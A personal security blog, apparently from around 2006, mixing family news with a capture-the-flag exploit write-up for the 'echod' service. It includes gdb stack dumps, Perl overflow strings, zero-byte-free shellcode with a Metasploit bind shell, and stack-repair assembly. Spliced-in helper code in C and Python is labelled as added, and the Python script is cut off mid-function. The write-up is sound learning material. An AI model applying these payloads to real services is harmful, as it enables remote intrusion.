But that's really just me shirking the job at hand. Taking a break from having my butt royally kicked by fucktcpd. I'm trying desperately to break fucktcpd by simple deadlisting... and I'm just not there yet. As you can tell, I've picked it back up... and oh. what a pleasant reunion, feeling it's entrails trickle down my spine as my brain fully bytes into the juicy code. The feeling of being naughty comes back in a welcome sense of alternate reality. One where bits really make a difference... one where appearances do not... one where politics are nowhere to be seen... and communication with the outside world requires translation. Ahhhh, sweet l'amour.
I'm sitting, looking at the deadlisting, attempting to ignore the distractions of people walking by, some more respectably clad than others. One mom wears an outfit with "Juicy" across her behind as she accompanies her 13-year-old daughter to a cup-o-joe.
It's really a small snippet of code? I've split out functions, split off the calls to outside libs, split off the glib startup and destructor code, and I'm left with "drop_privs", "checksum", and "server_loop"... symbols have been stripped so that's just my name for them.
As Evanescence and Blue Man Group set the mood of driving angst, I lament the missing vulnerability... Still, continuing onward and downward. Sure the end result will be my continued education, I bid you adieu as I get back to work.
I know it sounds like a B-52's song title, but it's what I'm doing right now. Essentially, it is too little sleep to stay awake, and too much caffeine to stay still... throw that together with a healthy dose of too much to do and no time to blog, and you have jitterblogging. Perhaps these french-fries will help my hands stop shaking.
A few days ago I took my wife to see Phantom of the Opera in the theatre. Awesome stuff. Talk about your social engineering! Everybody fears this guy, he gets an outrageous salary, gets to sing with a beautiful babe, and play nifty tricks, not to mention controlling everything! But alas, like all social engineers, one wrong move can cause the whole thing to come tumbling down... I forgot how much I love the theatre. I dropped nearly $140 for our tickets and it was worth every penny. I've always dreamed of playing the Phantom (yes, atlas can sing!)... but enough about that. If I had been more mature in college, perhaps I would have stuck with the vocal performance degree I started... but I probably wouldn't be where I'm at today...
I've been going crazy at work and at work. Dayjob has been dragging me in 8 different directions. Today it was pitting me against some odd issues with incompatible PEAP/802.1X wireless devices, and I'm having to laboriously deal with very nice technicians who can't suggest anything I hadn't tried before contacting them. That, on top of some recommendation reports for various aspects of security... Worst part is that I'm having to code some VB.NET for a customer for some crypto stuff... Oh, if only they approved of Python or Perl.
Night job (my company) has me too busy even to hack. Yes, I know, all three of you are waiting with baited breath for my next installment of fucktcpd, but it will have to wait. I have a product which is nearing completion, and am trying to focus on it so I can better enjoy hacking again without the guilt. It's almost to the pilot phase. Then comes the migration tools (from v1.x)... and then Documentation. Ewww yuck.
To make the month even better, my mother-in-law had surgery today, to fuse three vertebrae in her neck. For a normal person, this is awful. To a person whose "one thing" is horses, this is devastating. It's difficult to even think about it. Today I also found out that my friend's little brother died 3/1/06. My prayers and heart go out to her and her family. Wes was a good kid. It's hard to imagine losing a brother, or a child. I wish there were more to express what I'm feeling, but nothing comes out. Lack of content here does not indicate lack of impact.
I watched a truly horrid movie last night with my wife. We both wished we could have the two hours back after watching Bee Season. Imagine, one of the few movies Richard Gere doesn't play a total sleazebag and it's a worthless film. I guess it just goes to show that he has to play sleazoids. Either that or the screenwriter needs to be taught a bit about plot. The only thing I took away from that film was that they were all totally horked individuals... that's it. I did enjoy watching Aeon Flux a day or so before that however. What? I spend too much time watching movies and not enough hacking? I can see that point. Movies, TV, and reading are a few things I do with my family. Let me set the record straight: My family comes first. Yes, even before hacking. :) I also spend time cooking, playing soccer with my daughters, and riding horses/motorcycles. Ok, so the last part isn't family time, but hey! I'm jitterblogging. I don't need to be cohesive. Go read
CTF prequals are looming
I can't get a word from Kenshoto on when they'll be (gee, so maybe I won't plan company to visit for that weekend, or adopting a newborn, like last year) but it's coming. One of my opponents from last year (plato, the runner-up individual) asked me to lead a team this year so he could be on it. Along with Plato, I've been able to scrape up a really promising team. There's a lot of talent and brainpower in the group. Hopefully we can become a team. A couple years ago, the Detroit Red Wings were a perfect example of huge talent but team-challenges. They actually did a pretty good job of making it work. Hopefully we can do the same. More on the outstanding bunch of guys later. One thing I'm wondering is how the individual game will be played this year, (if at all; it caused a bit of ruckus last year) and how to capitalize on the wildcard factor. We shall see...
I did submit a talk to the defcon "call for papers" this year entitled "the making of atlas: kiddie to hacker in 5 sleepless nights". Before you go thinking it's a self-glorifying talk, it's not. Several people have seemed interested in this guy who taught himself how to hack from reading... so I'm hoping that gets the foot in the door. The talk is kind of a recount of prequals, specifically stage3, my first ever binary exploit and how I got there. It is a bit of an intro to hacking for the common techie, and is anything but self-glorifying. If anything, it's more of a "you could have done it just as easily" talk. The only thing I can claim credit for is overcoming my self-doubt and committing to it. Anyway, I have been working on my toolset (like converting it to Python and prettifying it) and plan to release it to the public at dc14 during my talk. It's not spectacular, but I've found the tools quite handy. Highlights include a format string exception generator and a disassembly tool (making calls to objdump and labeling, processing etc...)
And that, my friends, is the end of this jitterblog. I hope you've enjoyed it. Time for bed.
longtime no post
Yes, thank you for noticing, I've not posted in a while. And with good reason. I'm afraid I still have not had the time to post more about fucktcpd, so if that's what you're looking for, don't bother reading the rest of this post.
I recently did 4 interviews with a large security company only to be turned down. They had four positions and apparently I wasn't in the top four. The friend who got me to interview tells me I was close, but he's a friend, what's he gonna say? There are potentially other jobs I could do there, even perhaps better matching my "break things" direction... we'll see. They seem too busy to talk to me, which I can understand. They're starting a brand new department.
Bottom line is I'm content in my current job and that may be why I didn't make the top four... :(
Meanwhile, back at the ranch, we've had kids sick and me sick within the last few weeks. We're all doing much better though. And the family is great. I'm very thankful. I wish I could say I made it out without an inappropriate encounter with the toilet, however :/
My consulting/network appliance business has kept me busy. I've much to learn about the low-price appliance market, and I've already learned so much. The appliance cost and maintenance costs must cover the amount of work it generates or you end up doing a lot of stuff for free! :\ My wife kept me from mass marketing the thing a couple years ago. I'm kinda glad she did, given some of these lessons I'm having to learn. We are waiting until such a time as it makes sense (time-wise)... if that ever happens.
Meanwhile, I've been working to get the v2.0 of the product ready. It's a shift from one major distro to another completely different distro of Linux for its base. That is proving interesting. I am glad I'm doing the shift now rather than later. The switch is getting it off an RPM-based distro onto a DEB-based Ubuntu platform. This gives me a better update mechanism. That's always been a problem. If I wanted to make my own updates it was always having to hack into SuSE's online update mechanism which is proprietary. Debian distros are all using APT, which is just as easy to package for and much easier to maintain a software repository.
Anyway, I'm probably 3/4 way through the major refresh of the build package, which handles all the building/configuring events. I have some holes to fill in for the Modem and DSL connectivity pieces, and a few other areas to be completed. Then I move into the "spot-check" phase, where I test every major subsystem to see what doesn't work right. The todo list then serves as the countdown to pilot (which is where I convert my own systems one-by-one). Somewhere before then I have to work out the in-place upgrade process, where all the hard drive locations get moved into the new locations (as the Ubuntu packages often place things in different locations than SuSE).
Meanwhile, I'm reading "Reversing: Secrets of Reverse Engineering". Seems pretty good so far. I'm only into the second chapter, but it promises to be very good. I'm also reading The Shellcoder's Handbook, and Hacker's Disassembly Uncovered is next on the list.
Meanwhile, I have a singing gig in a few weeks..... A friend of mine and I are doing a duet "Never Alone" by Barlow Girl (yes, we're male-ifying a girl song)
Meanwhile, I've been working to come up to speed on PyElf, and contribute a little bit. It tears apart an ELF binary and should allow you to modify it and put it back together when we're done. This is a project lead by Visigoth and Metr0 from Kenshoto.
Meanwhile, I've put together a proposal for a DefCon 14 presentation and tool release. So I've been updating my hack-assistance tools and am going to package them and release them at dc14 if I get selected.
Meanwhile, I've taught myself Python which is an awesome language. My day-job is getting me to learn C# and VB.NET. And a part of me would like to learn Ruby someday. Perhaps I should do it, since I clearly don't have enough going on. :)
Meanwhile, I'm going to be teaching SANS 504: Hacker Techniques, Exploits, and Incident Handling soon. This was how I got my start into this world. I'm *really* geeked! I just finished mentoring this same course, which of course was 12 weeks long (normally 10 weeks). I've been wanting to teach this class since I took it with Ed Skoudis. I'm no Ed... but I guess neither was Ed when he started ;)
Meanwhile, the day job has got me doing a wide array of things, some still relatively new to me, some old hat. From configuring Wireless bridges to firewall design and maintenance, to application security assessments, etc... they keep me busy. We are doing a good deal of systems design and replacement of legacy core systems. And they have me involved during various phases to ensure security is designed in. They've also got me doing security audits on existing systems, and code audits will be the next step (which of course is the direction I'm enjoying). That's why I'm learning C# and VB.NET, so we can not only point out issues, but come to the table literally speaking the developers' language. Granted, I'm learning it a bit differently than they are ;) But you can't expect every Windows developer to learn on both Visual Studio *and* Mono, nor to spend the time disassembling the IL. ;)
Well, time to head. I wanted to let both of my readers know why they haven't seen any new posts in a while. The job-interviewing and stuff really took it out of me. I picked back up the deadlisting of fucktcpd, though. We shall overcome. It's enjoyable ;)
Well, as for the "next target", I've selected visigoth's "fucktcpd". But that's another post. Right now I wanted to share a little about rebuilding echod's stack so it returned properly.
*) Start with the basics (I know nothing about this, so I'm feeling my way): Returning in the program
A quick backtrace from the "reverse_echo_cmd" sub (using the debugger gdb) shows that returning correctly should send the instruction pointer to 0x804916a.
Hmmmmm, I know that at the beginning of each sub is a
push %ebp
mov %esp,%ebp
and checking the contents of the stack shows the address at %ebp+4, aka 0x4(%ebp):
13: x/32xw $ebp - 92
0xbfaedeec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedefc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf0c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf2c: 0x00000000 0xbfaedf50 0x0804c6bb 0x0804c6bc
0xbfaedf3c: 0x00000000 0xbfaedfec 0x08054700 0xbfaedfb8
0xbfaedf4c: 0x0804916a 0x00000004 0x00000002 0xbfaedf70
0xbfaedf5c: 0x00000000 0x00000000 0x00000000 0x0804a748
(%ebp is 0xbfaedf48, the last word of the 0xbfaedf3c row, holding the saved %ebp 0xbfaedfb8; 0x4(%ebp) is 0xbfaedf4c, the first word of the next row, holding the return address 0x0804916a)
We already knew this since that's the address we had to overwrite.
We'll refer to this snippit later on as we clean up the stack.
So I set a breakpoint at the "leave" instruction for this sub. Then,
allow the instruction to execute using "si".
I'm next left with the stack looking like this:
14: x/32xw $esp
0xbfaedf4c: 0x0804916a 0x00000004 0x00000002 0xbfaedf70
0xbfaedf5c: 0x00000000 0x00000000 0x00000000 0x0804a748
0xbfaedf6c: 0x00000002 0x0804a900 0x0804a904 0x00000000
0xbfaedf7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf9c: 0x00000000 0x00000000 0xbfaedf70 0x0000007d
0xbfaedfac: 0x00000004 0x00000000 0x00000000 0xbfaedfd8
0xbfaedfbc: 0x2807faf1 0xbfbfecc4 0x00000000 0x00000000
13: x/32xw $ebp - 92
0xbfaedf5c: 0x00000000 0x00000000 0x00000000 0x0804a748
0xbfaedf6c: 0x00000002 0x0804a900 0x0804a904 0x00000000
0xbfaedf7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfaedf9c: 0x00000000 0x00000000 0xbfaedf70 0x0000007d
0xbfaedfac: 0x00000004 0x00000000 0x00000000 0xbfaedfd8
0xbfaedfbc: 0x2807faf1 0xbfbfecc4 0x00000000 0x00000000
0xbfaedfcc: 0x00000000 0x00000000 0x280964bc 0x00000000
(the top part shows the stack starting with %esp. the
bottom views the stack so that %ebp is on the right side of the sixth
row, or the third from the bottom. in case you can't tell, these are
two of my favorite "display" settings in gdb)
Key point: See our favorite address at the very top of the stack. After poking around, the "leave" instruction reverses the beginning of the sub:
mov %ebp,%esp
pop %ebp
All that's left to do after that is to return to the calling
function...
So, when we're done with the shellcode (I broke the execve() call to tinker), we'll simply push 0x804916a and
then ret... Let's try it:
push $0x804916a
ret
This did indeed return me into handle_client where we left off, but I
get a segfault soon thereafter.
hmmm... it appears we have thrashed the stack, and must do some rebuilding.
Comparing at the start of the NOP sled to post-shellcode (sorry, no
screenshots for this one), it seems the shellcode used leaves 0x58
bytes on the stack. Well, they can't be blamed for not expecting
us to return here. Let's try readjusting %esp like so:
add $0x58,%esp   # clean up stack (messy, messy shellcodeses!)
Comparing again, %esp is where it should be. %ebp, however, is
*completely* smashed. Remember, the "leave" command did the "pop
%ebp"? Well, my initial sploit overwrote everything up to the
return address with "A", so of course, %ebp looks like "0x41414141".
So, I make the change in my sploit to overwrite this space with
the correct value of %ebp afterward (which we'll find is a problem
later), and a couple other fixes:
$string = "REV \x05\xbf\xae\xdb\x50\xbf\xae\xdf\xb8\x08\x04\xad\x04\xbf\xae\xdf\xec\xbf\xae\xdf\x3d" . "A"x94 . reverse($shellcode) . $NOP;
(you may wonder about the initial \x05. The
string ends in 0x00, and this byte overwrites the significant part of
the next value on the stack: 0x00000005. By prepending the \x05,
we overwrite the *next* byte with the 0x00, which happens to already
equal that )
This worked! However, in the process of figuring this out, I ran across another nifty fact about multithreaded apps which I'll get into in a few minutes.
So, we have returned into the calling sub, reset %esp to its appropriate place, and %ebp now returns to its appointed position.
That should be good, right? wrong. Don't get me
wrong, this was quite an accomplishment, but I'm not quite there yet.
We are returning into handle_client fine, and disconnecting the
connection does allow handle_client to exit, and the thread looks like
it's about to be recycled... then it SegFaults.
What? Hmmmm.... So what are we missing? Well,
apparently the thread destructor does a jmp %ebx or somesuch.... and of
course, %ebx is used in the shellcode. DOH! So, ok, I'll
push %ebx at the beginning of the shellcode, then pop it off later.
That seems to work, at least as far as I have pursued it so
far... More on that later (perhaps in another post).
The problem that keeps nagging me at this point is as follows:
I'm discovering that this sucker assigns a chunk of stack space
for each thread. So the first thread might be at 0xbfaeXXXX, the
second thread is then at 0xbfadXXXX, and the next thread at 0xbfacXXXX
and so on. I can predict where *within that space* the data is
going to reside, however, I can't predict what thread I'll get...
And worse yet, this puppy doesn't just affect returning
gracefully, this affects exploit execution altogether. I'm
returning into the stack, so that stack has to be the same, or my
sploit has to magically change on-the-fly prior to any
sploit-execution... Not very possible in *this* universe. I
had been experiencing odd inconsistencies on occasion, and it looks
like this is the culprit.
The solution, however, was quite nice. Ok, so the stack space is
dynamic and a change of threads can totally screw up the exploit.
There happens to be a place in memory this data gets copied to
for every thread: 0x804a904
This is shared memory, so it's still possible to run into issues if
other threads write to it before we can execute the shellcode, but it's
the best thing I can find. One key point: This data is
*PRE-REVERSING* so the shellcode has to go back to straight-forward.
So the sploit code starts to look like this:
$string = "REV \x05\x08\x04\xa9\x50\xbf\xae\xdf\xb8\x08\x04\xad\x04\xbf\xae\xdf\xec\xbf\xae\xdf\x3d" . "A"x93 . $shellcode . $NOP;
We dropped the return pointer a little after the start of the
memory buffer so as not to try to execute the "stack repairing" data as
code.
Ok, so we can execute code regardless of thread... but now we have the
whole return gracefully thing. If we hard-code the %ebp
replacement (as we currently are) we could really cause nasties, as the
%ebp for thread 2 would then point to the stack for thread 1! Not
good. Solution?
My choice was to compare %ebp to %esp. Luckily the relationship
appears static at this point in the code. %ebp is consistently
0x68 bytes greater than %esp. So we just add 0x68 to %esp and we
get %ebp, right? Well, sorta. There are two tricks to it:
We have to make %ebp = %esp, then do the addition to %ebp.
We can't simply add 0x68, since that compiles to \x81\xc5\x68\x00\x00\x00 and that is not String-friendly (ie. the string ends at the first \x00, boys). (For an immediate that fits in a signed byte an assembler will normally pick the short form 83 c5 68, which has no zero bytes at all; the pad trick below becomes unavoidable once the adjustment exceeds 0x7f, as with the 0xa4 variant in the notes at the end of this post.)
We're not only interested in %ebp's location, but also interested
in the content there. This determines the *next* part of the
stack trace, apparently 0x20 bytes north of here.
My solution looks a little like this:
54                  push %esp             # clean up ebp: start with %ebp = %esp
5d                  pop  %ebp             #   "
81 c5 68 01 01 01   add  $0x1010168,%ebp  # + 0x68 - 1
81 ed 01 01 01 01   sub  $0x1010101,%ebp  #   "
89 6d 01            mov  %ebp,0x1(%ebp)   #   "
83 45 01 21         addl $0x21,0x1(%ebp)  #   "
45                  inc  %ebp             # done cleaning up ebp
Start off setting %ebp=%esp.
Then, add 0x01010168 to %ebp (no zeros)
Next, subtract 0x01010101 from %ebp (putting %ebp at 1 less than it should be)
Then, we put %ebp's value into the location %ebp should be pointing at
Increment that value by 0x21 (0x20 + the 1 off that %ebp is currently)
Finally, increment %ebp to its proper location.
Why did I leave %ebp one-off? Because a store through %ebp with no displacement, mov %ebp,(%ebp), assembles to 89 6d 00: with %ebp as the base register the encoding always carries a displacement byte, and a zero displacement puts a 0x00 in the string, ending it and foiling the overflow attempt. Using 0x1(%ebp) instead gives 89 6d 01.
Ok, so the shellcode ends up looking like this:
<NOP SLED>
0x804a976 <recv_msg.0+118>: push %ebx              # save ebx for later
<METASPLOIT BSD BIND SHELL>
0x804a9c5 <recv_msg.0+197>: add $0x58,%esp         # clean up stack (messy, messy shellcodeses!)
0x804a9c8 <recv_msg.0+200>: pop %ebx               # clean up ebx
0x804a9c9 <recv_msg.0+201>: push %esp              # clean up ebp
0x804a9ca <recv_msg.0+202>: pop %ebp               #   "
0x804a9cb <recv_msg.0+203>: add $0x1010168,%ebp    #   "
0x804a9d1 <recv_msg.0+209>: sub $0x1010101,%ebp    #   "
0x804a9d7 <recv_msg.0+215>: mov %ebp,0x1(%ebp)     #   "
0x804a9da <recv_msg.0+218>: addl $0x21,0x1(%ebp)   #   "
0x804a9de <recv_msg.0+222>: inc %ebp               #   "
0x804a9df <recv_msg.0+223>: push $0x804916a        # push address for "Happy Returns"
0x804a9e4 <recv_msg.0+228>: ret                    # return into the old happy hunting grounds!
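As an added example, not code from the original post, here is a small C harness that emulates the %ebp-repair sequence above on a constructed byte buffer standing in for the thread's stack, using the values from the gdb dumps (%esp = 0xbfaedf50 after the ret, %ebp expected at 0xbfaedfb8 with 0xbfaedfd8 stored there). It also checks the add/sub immediates for zero bytes, and it goes slightly beyond the post by taking an arbitrary delta and reporting when the 0x01010101 pad cannot produce a zero-free immediate. The buffer, its base address, and the helper names are the example's own assumptions.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Constructed stand-in for the thread's stack: 256 bytes covering the
 * addresses seen in the gdb dumps (0xbfaedf00 .. 0xbfaedfff). */
#define STACK_BASE 0xbfaedf00u
#define STACK_LEN  256u
static uint8_t fake_stack[STACK_LEN];

/* Unaligned 32-bit load/store at a "stack address", as the CPU would do. */
static uint32_t rd32(uint32_t addr) {
    uint32_t v;
    memcpy(&v, fake_stack + (addr - STACK_BASE), sizeof v);
    return v;
}
static void wr32(uint32_t addr, uint32_t v) {
    memcpy(fake_stack + (addr - STACK_BASE), &v, sizeof v);
}

/* A zero byte anywhere in an immediate would terminate the overflow string. */
int has_nul_byte(uint32_t imm) {
    for (int i = 0; i < 4; i++)
        if (((imm >> (8 * i)) & 0xffu) == 0)
            return 1;
    return 0;
}

/* The add/sub pad trick from the post: add (PAD + delta - 1), then sub PAD,
 * which leaves %ebp one short of %esp + delta. The -1 is what lets the
 * following store use 0x1(%ebp) instead of the zero-displacement (%ebp).
 * Returns 1 if both immediates are free of zero bytes, 0 otherwise. */
int nullfree_pair(uint32_t delta, uint32_t *add_imm, uint32_t *sub_imm) {
    const uint32_t pad = 0x01010101u;
    *add_imm = pad + delta - 1;
    *sub_imm = pad;
    return !has_nul_byte(*add_imm) && !has_nul_byte(*sub_imm);
}

/* Emulate the seven-instruction repair sequence:
 *   push %esp ; pop %ebp ; add $add_imm,%ebp ; sub $sub_imm,%ebp
 *   mov %ebp,0x1(%ebp) ; addl $(saved_off+1),0x1(%ebp) ; inc %ebp
 * delta     = distance from %esp to where %ebp belongs (0x68 in the post)
 * saved_off = distance from %ebp to the saved %ebp it must hold (0x20)
 * Returns the repaired %ebp (0 if unencodable); *saved_out gets the word at it. */
uint32_t repair_frame(uint32_t esp, uint32_t delta, uint32_t saved_off,
                      uint32_t *saved_out) {
    uint32_t add_imm, sub_imm;
    if (!nullfree_pair(delta, &add_imm, &sub_imm))
        return 0;                               /* would need a 0x00 byte */
    uint32_t ebp = esp;                         /* push %esp ; pop %ebp */
    ebp += add_imm;                             /* add $add_imm,%ebp */
    ebp -= sub_imm;                             /* sub $sub_imm,%ebp  (= esp+delta-1) */
    wr32(ebp + 1, ebp);                         /* mov %ebp,0x1(%ebp) */
    wr32(ebp + 1, rd32(ebp + 1) + saved_off + 1); /* addl $0x21,0x1(%ebp) */
    ebp += 1;                                   /* inc %ebp */
    *saved_out = rd32(ebp);
    return ebp;
}

int main(void) {
    uint32_t saved = 0, add_imm = 0, sub_imm = 0;
    nullfree_pair(0x68, &add_imm, &sub_imm);
    printf("add $0x%x / sub $0x%x\n", add_imm, sub_imm);
    uint32_t ebp = repair_frame(0xbfaedf50u, 0x68, 0x20, &saved);
    printf("ebp = 0x%08x, [ebp] = 0x%08x\n", ebp, saved);
    return 0;
}
```

With the post's numbers the emulation lands %ebp on 0xbfaedfb8 holding 0xbfaedfd8, matching the second gdb dump; feeding a delta such as 0x100 makes nullfree_pair fail, which is the case where a different pad constant has to be chosen.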
Ok, here's the current state of things.
I mentioned before that I broke the execve() call while working on
this. Fixing it made the bind shell take place but then exited
(gracefully :( )
As it turns out, I don't have a fork() call before the execve(), so all
this is for naught at the moment. I have to add in the fork()
call before moving forward on the cleanup process. I believe this
will look something like this:
call fork               # duh
test %eax,%eax          # parent process gets child pid in eax, child gets 0x0
jnz keepgoing           # parent moves on to clean up stack and return
(execve code stuffs)    # child gets to execve() which then exits
keepgoing:
(cleanup stack, ret)
(test/jnz rather than a cmp against an immediate: in AT&T syntax "cmp %eax,0x0" would compare against memory at address 0, and "test %eax,%eax" is also free of zero bytes)
The next challenge I'd like to take on is connection re-use. This
is where the exploit reuses the same connection to bind the shell to.
That is a whole other ball of wax. Perhaps something for
fucktcpd? Perhaps for echod? Who knows. Stick around
to find out!
------------------------------------------
Here's directly from my notes (forgive the laziness here, just want to
include as much as possible and I've still got a lot of work and
learning to do):
Learned:
returning back into the program is not hard... simply "push (ret
address)" and "ret"
*) apparently, "leave" (executed directly before "ret") cleans up local
variables and pops off %ebp kinda like this:
mov %ebp, %esp
pop %ebp
returning back into the program *correctly* is not so much... the stack
must be in decent condition, and %ebp must be repaired...
*) While I'm able to overwrite %ebp with a typical value, the multithreading makes this part more difficult.
*) Instead, I'm trying the following approach within my shellcode:
14: 54 push %esp
15: 5d pop %ebp
16: 81 c5 a5 01 01 01 add $0x10101a4,%ebp # + A4, size of the stack for handle_client, the calling sub
1c: 81 ed 01 01 01 01 sub $0x1010101,%ebp #
22: 89 6d 01 mov %ebp,0x1(%ebp)
25: 83 45 01 30 addl $0x30,0x1(%ebp)
29: 45 inc %ebp
2a: 68 6a 91 04 08 push $0x804916a
2f: c3 ret
multithreaded app creates difficulties for both returning into
shellcode as well as returning gracefully....
multithreading causes issues with ebp as well.
*) each thread has its own stack space. 0xbfaexxxx for one thread while
0xbfadxxxx for another
%ebp points to its previous location, making backtraces simple?
Well, you made it here. That's the first hurdle!
Many thanks to Kurios for the use of his blog-space over at blogspot. He should be moving over this way soon too...
New feature: RSS Feeds! So you don't like checking back all the time!? Well, feed the link at the left side here into your favorite RSS reader and you'll see the latest headlines. That's something Blogspot doesn't seem to offer.
Nothing new to report. Family responsibilities, getting ready for vacation, holidays, and on-call at work have made this a very interesting month, to say nothing of the GoogleHacking course I taught tonight (yes, the night of my first day of vacation... not likely the wife's going to forgive that one any time soon).
The class went pretty well, although there were a couple guys unhappy with the content. I'm going to see if I can't make it worth their while and do some more stuff behind the scenes. I started a mailing list for the class. Kinda silly since it was a one-nighter, but it introduces some interesting possibilities. We'll see how that goes.
They want to know when I can do more, but all that work for a very small amount of money... not sure. Great fun, though. I do love teaching. But all the prep work involved makes it pay less than my day job. Maybe I can improve on that next course. We'll see.
I haven't decided my next target for hacking yet. I'll have to decide that when I get back from vacation.
echod is now on life support only. Officially dead, I now wish to clean up my sploit to have it continue execution. We'll have to see about that one. :\ Can't say I've ever written a sploit to return, but this seems like a great time to start.
It's actually been a week since I've been able to touch it, so I'm not feeling quite as lame as I was last week. Work has extended into the evenings and then there was the wedding I had to liven up :) (kudos to Ryan and Rachel!)
This round in my fight with echod was much less confounding. I had already structured the exploit code so I could tinker with the header (as the term suggests, I'm speaking of the initial set of bytes which hold the address to overwrite the return pointer and some other goodies used to reconstruct the stack... remember that everything is reversed). The string dynamically generates NOPs to correct the buffer size from any changes.
Since that was already in place, I simply pumped some net-bind shellcode through "reverse()" and appended the resulting string to the sploit header (thanks again, Metasploit!). This broke stuff at first. It seems some of the memory the shellcode was occupying gets altered before execution. Solution? Add some NOPs after the header, before the shellcode, and check again. I ended up using 96 (nice round number) NOPs for this as 32 and 56 were not enough. Surprisingly, that provided a stable/consistent exploit.
As an exercise, I then wrote three while loops:
*) one to check the service and restart it if dead
*) one to run the exploit, connect using netcat, read, then overwrite a simulated "key" file, like in the CTF
*) one to check the "key" file and overwrite it with the correct value if overwritten
These have been going now for some time and working quite nicely. Now, I just need to turn my attention to returning gracefully. I believe the appropriate course of action is to "mov 0x<someaddress> 0x4(%ebp)" and then call "ret" instead of calling "exit()". We'll see how that works out.
I'll let you know. I feel awful right now and am driving home from Skelletones, so coding has stopped. Between the fog and deer-hazards, blogging is all I can manage! Perhaps if I felt better ;)
echod bleeds...
Program received signal SIGSEGV, Segmentation fault.
0xbfaedf4d in ?? ()
Finally, after weeks of teeth-gnashing I have been able to get echod to consistently bleed, yet some of the blood is my own.
(for those of you not fortunate enough to understand it, this indicates that I have changed the instruction pointer to someplace in the stack where it doesn't belong... one or two steps from shell-access)
It's bleeding, not dead yet. I have to inject shellcode (in reverse for this vuln) before I can stick a fork in this baby.
I wish I could say "I finally got around to looking at it..." but I've been working on it ever since Def Con (many times only 1/2 hour at a time, which is awful). I have learned quite a bit, however, and have been intentionally taking my time, capitalizing on the opportunity to improve my skills (I've played and explored a bit. Big fun the "pay-for" guys might not get to enjoy as much). Still, I gotta get faster, even with the tough ones.
echod presents challenges, although much of my pain was self-inflicted. echod is multi-threaded, presenting oddities with both debugging and fuzzing. gdb would be piping along and suddenly it would inform me that it just thread-hopped and I was starting from a different location, working different logic. It became particularly difficult because I had my pseudo-fuzzer (it doesn't deserve to be called a real one) set in a loop most of the time... which I think somehow caused several threads to be pumping information into the binary, while I'm also attempting to debug and make sense out of the assembly. argggh! Aside from turning "0x0a" to "0x00" and splitting strings on "0x20", the string was pretty much straightforward, although the "reversing" functionality employed some logic I couldn't quite follow without stepping through it (and even then, it's up in the air).
That isn't to say that I didn't learn a great deal along the way.. You could say that I learned many things about reverse engineering, particularly threaded apps. Here are a few:
Printing the dis/assembly is invaluable!
Rather than avoiding "jump" calls to focus on the "meat", recognize that they are the structure. Capitalize on the opportunity to determine program flow. Draw the jumps with an arrow for each early in the reversing process
Determine the "conditional statements" from the "jump" statements. Is it a "while (???) { }" or an "if (???) { }", and what are the constraints? This helps determine where the "edges" of the program are
"Ignore %reg, look around for meaning!" i.e. pay more attention to what memory location each register *represents*, instead of focusing on %eax specifically. Map this out on paper, being interested more in 0xffffffbe(%ebp) or 0x8(%ebp) instead.
Each sub has a finite number of variables (locals, params, and heap)... know them. Label them if you can tell their purpose.
For (%reg), look for %reg assignment BEFORE this line
For %reg, look for %reg storage AFTER this line
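A small script that applies those rules to a listing, added here as an example and not code from the original post: it parses objdump-style AT&T output, marks every direct jump with its target and whether it is a backward edge (a loop) or a forward one (an if body being skipped, or a plain goto), and names each %ebp-relative slot as an argument or a local so you can "ignore %reg and look around for meaning". The listing is constructed to resemble a byte loop that turns 0x0a into 0x00; it is not echod's code, and the symbol name `handle` is made up.

```python
"""Mark jump edges and name stack slots in an objdump-style AT&T listing.

Added example, not code from the original post. SAMPLE is constructed: it
resembles a loop that turns 0x0a into 0x00 but is not taken from echod.
"""
import re
from dataclasses import dataclass

INSN_RE = re.compile(r'^\s*([0-9a-f]+):\s+([a-z]\w*)\s*(.*)$')
EBP_RE = re.compile(r'(-?0x[0-9a-f]+)?\(%ebp\)')

# Constructed listing: for (i = 0; i < len; i++) if (buf[i] == '\n') buf[i] = 0;
SAMPLE = """\
08048400 <handle>:
 8048400: push   %ebp
 8048401: mov    %esp,%ebp
 8048403: sub    $0x28,%esp
 8048406: movl   $0x0,-0x4(%ebp)
 804840d: jmp    8048422 <handle+0x22>
 804840f: mov    -0x4(%ebp),%eax
 8048412: mov    0x8(%ebp),%edx
 8048415: movzbl (%edx,%eax,1),%ecx
 8048419: cmp    $0xa,%cl
 804841c: jne    8048422 <handle+0x22>
 804841e: movb   $0x0,(%edx,%eax,1)
 8048422: addl   $0x1,-0x4(%ebp)
 8048426: mov    -0x4(%ebp),%eax
 8048429: cmp    0xc(%ebp),%eax
 804842c: jl     804840f <handle+0xf>
 804842e: leave
 804842f: ret
"""


@dataclass
class Insn:
    addr: int
    mnem: str
    ops: str


def parse(listing):
    """Keep only 'addr: mnemonic operands' lines; symbol header lines are dropped."""
    insns = []
    for line in listing.splitlines():
        m = INSN_RE.match(line)
        if m:
            insns.append(Insn(int(m.group(1), 16), m.group(2), m.group(3).strip()))
    return insns


def jump_edges(insns):
    """(src, dst, kind) for every direct jump: 'loop' when it goes backward,
    'goto' for a forward jmp, 'branch' for a forward conditional jump.
    A backward conditional edge usually closes a while; a forward one skips an if body."""
    edges = []
    for i in insns:
        if not i.mnem.startswith('j'):
            continue
        try:
            dst = int(i.ops.split()[0], 16)
        except (IndexError, ValueError):
            continue  # indirect jump such as 'jmp *%eax': no static target
        if dst < i.addr:
            kind = 'loop'
        elif i.mnem == 'jmp':
            kind = 'goto'
        else:
            kind = 'branch'
        edges.append((i.addr, dst, kind))
    return edges


def slot_name(offset):
    """Name an %ebp-relative slot: 0x8(%ebp) is arg0, 0xc(%ebp) arg1, negatives are locals."""
    if offset >= 8:
        return 'arg%d' % ((offset - 8) // 4)
    if offset == 4:
        return 'retaddr'
    if offset == 0:
        return 'saved_ebp'
    return 'local_%x' % -offset


def _offset(m):
    return int(m.group(1), 16) if m.group(1) else 0


def frame_slots(insns):
    """Map each named slot to the addresses of the instructions that touch it."""
    slots = {}
    for i in insns:
        for m in EBP_RE.finditer(i.ops):
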